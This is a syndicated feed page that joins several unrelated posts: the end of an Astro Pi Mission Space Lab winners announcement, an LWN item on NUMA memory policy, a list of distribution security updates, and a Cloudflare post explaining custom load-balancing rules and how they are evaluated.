Juno from Institut d’Altafulla in Spain, who attempted to determine how much heat the astronauts aboard the ISS experience by using temperature, pressure, and humidity data captured by the Astro Pi’s sensors together with psychrometric calculations.

Albedo from Lycée Albert Camus in France, who investigated albedo on Earth, using photos captured by the Astro Pi’s camera to classify cloud, land, and sea coverage, and analysing their corresponding albedo values.

The river Nile in Sudan shown from space by an Astro Pi computer on the International Space Station
The river Nile in Sudan as captured by the Spacepi2 team

SpaceRad from Centrum Nauki Keplera – Planetarium Wenus in Poland, who also investigated albedo (the proportion of light or radiation that is reflected by a surface) on Earth to evaluate the efficacy of using solar farms to combat climate change.

Magtrix from The Leys School in the United Kingdom, who analysed whether geographical features of Earth such as mountains affect the planet’s magnetic field using the Astro Pi’s magnetometer, GPS data, and photos of Earth captured by the Astro Pi’s camera.

Newfoundland and Labrador shown from space by an Astro Pi computer on the International Space Station
Newfoundland and Labrador as captured by the SpaceRad team

Mechabot from Robone Robotics Club in Germany, who investigated how the Earth’s magnetic field correlates with its climate, and how this affects near-Earth objects’ behaviour in low-Earth orbit.

Spacepi2 from Zanneio Model High School in Greece, who investigated urbanisation on Earth by comparing photos captured by the Astro Pi’s camera with historical data using an automated photo classification program they created and NDVI analysis.

Sakhalin Oblast in Russia shown from space by an Astro Pi computer on the International Space Station
Sakhalin Oblast in Russia as captured by the Liontech team

Highly commended teams

Bergson from Lycée Henri-Bergson Paris in France, who built an AI model predicting nitrogen dioxide pollution levels on Earth using NDVI analysis of photos taken by the Astro Pi’s camera.

The Tiwi Islands off the coast of Northern Australia shown from space by an Astro Pi computer on the International Space Station
The Tiwi Islands off the coast of Northern Australia as captured by the Magtrix team

LionTech from Mihai Eminescu National College, Oradea in Romania, who attempted to measure the velocity of the ISS in orbit, and also created an algorithm to detect smoke, pollution, and types of cloud coverage in the images they captured using the Astro Pi’s camera.

RosSpace from Ceo Boecillo in Spain, who are the third team in our list to have investigated Earth’s albedo levels in relation to global warming using photo analysis. A popular theme this year!

The Amur River and Sea of Oghotsk in Eastern Russia shown from space by an Astro Pi computer on the International Space Station
The Amur river and the Sea of Oghotsk (right) in Eastern Russia as captured by the Zeus team

Jupiter from Institut d’Altafulla in Spain, who looked at variations in the current surface area of water bodies on Earth compared to historical records as an indicator of climate change.

And a special mention for:

Ultrafly from Ultrafly Coding Club in Canada, who were the youngest team to make the highly commended list this year, with an average age of 8! Their experiment explored whether the environmental variables on the ISS created allergy-friendly living conditions for the astronauts on board.

The prize? A special webinar with ESA Astronaut Luca Parmitano

Every Astro Pi team that reached Phase 2 of Mission Space Lab by having their experiment idea accepted this year will receive participation certificates recognising their achievement, and the winners and highly commended teams will receive special certificates and an additional prize.

The prize for this year’s winners and highly commended teams is the chance to pose their questions to ESA astronaut Luca Parmitano during a webinar in September! We’ll shortly email the teams’ mentors the instructions for submitting their teams’ questions to Luca.

ESA Astronaut Luca Parmitano floating aboard the ISS with two Astro Pi computers
ESA Astronaut Luca Parmitano floating aboard the ISS with the two Astro Pi computers

This Q&A event for the finalists will conclude this year’s European Astro Pi Challenge. It’s been an incredible year for the Challenge, with 15756 young people from 23 countries participating in Mission Zero or Mission Space Lab.

Everyone on the Raspberry Pi and ESA Education teams congratulates this year’s participants for their efforts, especially given the obstacles many teams had to overcome due to the coronavirus pandemic.

Thank you and congratulations to everyone who has taken part — we hope you found it as fun and inspiring as we did!

We can’t wait to welcome you back for the next European Astro Pi Challenge!

While this year’s Challenge is coming to an end, the European Astro Pi Challenge will return with both Mission Zero and Mission Space Lab in September!

Logo of the European Astro Pi Challenge

We invite all teachers, educators, club leaders, and young people who love coding and space science to follow our updates on astro-pi.org and the Astro Pi Twitter account to make sure you don’t miss any announcements.

The post Amazing science from the winners of Astro Pi Mission Space Lab 2020/21 appeared first on Raspberry Pi.

[$] NUMA policy and memory types

Post Syndicated from original https://lwn.net/Articles/862707/rss

Non-uniform memory access (NUMA) systems have an architecture that attaches
memory to “nodes” within the system. CPUs, too, belong to nodes; memory
that is attached to the same node as a CPU will be faster to access (from
that CPU) than memory on other nodes. This aspect of performance has
important implications for programs running on NUMA systems, and the kernel
offers a number of ways for user space to optimize their behavior. The NUMA
abstraction is now being extended, though, and that is driving a need for
new ways of influencing memory allocation; the multi-preference
memory policy
patch set is an attempt to meet that need.

Security updates for Friday

Post Syndicated from original https://lwn.net/Articles/863180/rss

Security updates have been issued by CentOS (firefox), Debian (firefox-esr), Fedora (linuxptp), Gentoo (commons-collections), Mageia (aom, firefox, python-django, thunderbird, and tpm2-tools), openSUSE (claws-mail, kernel, nodejs10, and nodejs14), Red Hat (nettle), Scientific Linux (firefox), SUSE (firefox, kernel, nodejs10, and nodejs14), and Ubuntu (libslirp and qemu).

Rich, complex rules for advanced load balancing

Post Syndicated from Brian Batraski original https://blog.cloudflare.com/rich-complex-rules-for-advanced-load-balancing/

Rich, complex rules for advanced load balancing

Rich, complex rules for advanced load balancing

Load Balancing — functionality that’s been around for the last 30 years to help businesses leverage their existing infrastructure resources. Load balancing works by proactively steering traffic away from unhealthy origin servers and — for more advanced solutions — intelligently distributing traffic load based on different steering algorithms. This process ensures that errors aren’t served to end users and empowers businesses to tightly couple overall business objectives to their traffic behavior.

What’s important for load balancing today?

We are no longer in the age where setting up a fixed amount of servers in a data center is enough to meet the massive growth of users browsing the Internet. This means that we are well past the time when there is a one size fits all solution to suffice the needs of different businesses. Today, customers look for load balancers that are easy to use, propagate changes quickly, and — especially now — provide the most feature flexibility. Feature flexibility has become so important because different businesses have different paths to success and, consequently, different challenges! Let’s go through a few common use cases:

  • You might have an application split into microservices, where specific origins support segments of your application. You need to route your traffic based on specific paths to ensure no single origin can be overwhelmed and users get sent to the correct server to answer the originating request.
  • You may want to route traffic based on a specific value within a header request such as “PS5” and send requests to the data center with the matching header.
  • If you heavily prioritize security and privacy, you may adopt a split-horizon DNS setup within your network architecture. You might choose this architecture to separate internal network requests from public requests from the rest of the public Internet. Then, you could route each type of request to pools specifically suited to handle the amount and type of traffic.

As we continue to build new features and products, we also wanted to build a framework that would allow us to increase our velocity to add new items to our Load Balancing solution while we also take the time to create first class features as well. The result was the creation of our custom rule builder!

Now you can build complex, custom rules to direct traffic using Cloudflare Load Balancing, empowering customers to create their own custom logic around their traffic steering and origin selection decisions. As we mentioned, there is no one size fits all solution in today’s world. We provide the tools to easily and quickly create rules that meet the exact requirements needed for any customer’s unique situation and architecture. On top of that, we also support ‘and’ and ‘or’ statements within a rule, allowing very powerful and complex rules to be created for any situation!

Load Balancing by path becomes easy, requiring just a few minutes to enter the paths and some boolean statements to create complex rules. Steer by a specific header, query string, or cookie. It’s no longer a pain point. Leverage a split horizon DNS design by creating a rule looking at the IP source address and then routing to the appropriate pool based on the value. This is just a small subset of the very robust capabilities that load balancing custom rules makes available to our users and this is just the start! Not only do we have a large amount of functionality right out of the box, but we’re also providing a consistent, intuitive experience by building on our Firewall Rules Engine.

Let’s go through some use cases to explore how custom rules can open new possibilities by giving you more granular control of your traffic.

High-volume transactions for ecommerce

For any high-volume transaction business such as an ecommerce or retail store, ensuring the transactions go through as fast and reliably as possible is a table stakes requirement. As transaction volume increases, no single origin can handle the incoming traffic, and it doesn’t always make sense for it to do so. Why have a transaction request travel around the world to a specifically nominated origin for payment processing? This setup would only add latency, leading to degraded performance, increased errors, and a poor customer experience. But what if you could create custom logic to segment transactions to different origin servers based on a specific value in a query string, such as a PS5 (associated with Sony’s popular PlayStation 5)? What if you could then couple that value with dynamic latency steering to ensure your load balancer always chooses the most performant path to the origin? This would be game changing to not only ensure that table-stakes transactions are reliable and fast but also drastically improve the customer experience. You could do this in minutes with load balancing custom rules:

Rich, complex rules for advanced load balancing

For any requests where the query string shows ‘PS5’, then route based on which pool is the most performant.

Load balance across multiple DNS vendors to support privacy and security

Some customers may want to use multiple DNS providers to bolster their resiliency along with their security and privacy for the different types of traffic going through their network. By utilizing  two DNS providers, customers can not only be sure that they remain highly available in times of outages, but also direct different types of traffic, whether that be internal network traffic across offices or unknown traffic from the public Internet.

Without flexibility, however, it can be difficult to easily and intelligently route traffic to the proper data centers to maintain that security and privacy posture. Not anymore! With load balancing custom rules, supporting a split horizon DNS architecture takes as little as five minutes to set up a rule based on the IP source condition and then overwriting which pools or data centers that traffic should route to.

Rich, complex rules for advanced load balancing

This can also be extremely helpful if your data centers are spread across multiple areas of the globe that don’t align with the 13 current regions within Cloudflare. By segmenting where traffic goes based on the IP source address, you can create a type of geo-steering setup that is also finely tuned to the requirements of the business!

How did we build it?

We built Load Balancing rules on top of our open-source wirefilter execution engine. People familiar with Firewall Rules and other products will notice similar syntax since both products are built on top of this execution engine.

By reusing the same underlying engine, we can take advantage of a battle-tested production library used by other products that have the performance and stability requirements of their own. For those experienced with our rule-based products, you can reuse your knowledge due to the shared syntax to define conditionals statements. For new users, the Wireshark-like syntax is often familiar and relatively simple.

DNS vs Proxied?

Our Load Balancer supports both DNS and Proxied load balancing. These two protocols operate very differently and as such are handled differently.

For DNS-based load balancing, our load balancer responses to DNS queries sent from recursive resolvers. These resolvers are normally not the end user directly requesting the traffic nor is there a 1-to-1 ratio between DNS query and end-user requests. The DNS makes extensive use of caching at all levels so the result of each query could potentially be used by thousands of users. Combined, this greatly limits the possible feature set for DNS. Since you don’t see the end user directly nor know if your response is going to be used by one or more users, all responses can only be customized to a limited degree.

Our Proxied load balancing, on the other hand, processes rules logic for every request going through the system. Since we act as a proxy for all these requests, we can invoke this logic for all requests and access user-specific data.

These different modes mean the fields available to each end up being quite different. The DNS load balancer gets access to DNS-specific fields such as “dns.qry.name” (the query name) while our Proxied load balancer has access to “http.request.method” (the HTTP method used to access the proxied resource). Some more general fields — like the name of the load balancer being used — are available in both modes.

Rich, complex rules for advanced load balancing

How does it work under the hood?

When a load balancer rule is configured, that API call will validate that the conditions and actions of the rules are valid. It makes sure the condition only references known fields, isn’t excessively long, and is syntactically valid. The overrides are processed and applied to the load balancers configuration to make sure they won’t cause an invalid configuration. After validation, the new rule is saved to our database.

With the new rule saved, we take the load balancer’s data and all rules used by it and package that data together into one configuration to be shipped out to our edge. This process happens very quickly, so any changes are visible to you in just a few seconds.

While DNS and proxied load balancers have access to different fields and the protocols themselves are quite different, the two code paths overlap quite a bit. When either request type makes it to our load balancer, we first load up the load balancer specific configuration data from our edge datastore. This object contains all the “static” data for a load balancer, such as rules, origins, pools, steering policy, and so forth. We load dynamic data such as origin health and RTT data when evaluating each pool.

At the start of the load balancer processing, we run our rules. This ends up looking very much like a loop where we check each condition and — if the condition is true — we apply the effects specified by the rules. After each condition is processed and the effects are applied we then run our normal load balancing logic as if you have configured the load balancer with the overridden settings. This style of applying each override in turn allows more than one rule to change a given setting multiple times during execution. This lets users avoid extremely long and specific conditionals and instead use shorter conditionals and rule ordering to override specific settings creating a more modular ruleset.

What’s coming next?

For you, the next steps are simple. Start building custom load balancing rules! For more guidance, check out our developer documentation.

For us, we’re looking to expand this functionality. As this new feature develops, we are going to be identifying new fields for conditionals and new options for overrides to allow more specific behavior. As an example, we’ve been looking into exposing a means to creating more time-based conditionals, so users can create rules that only apply during certain times of the day or month. Stay tuned to the blog for more!

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close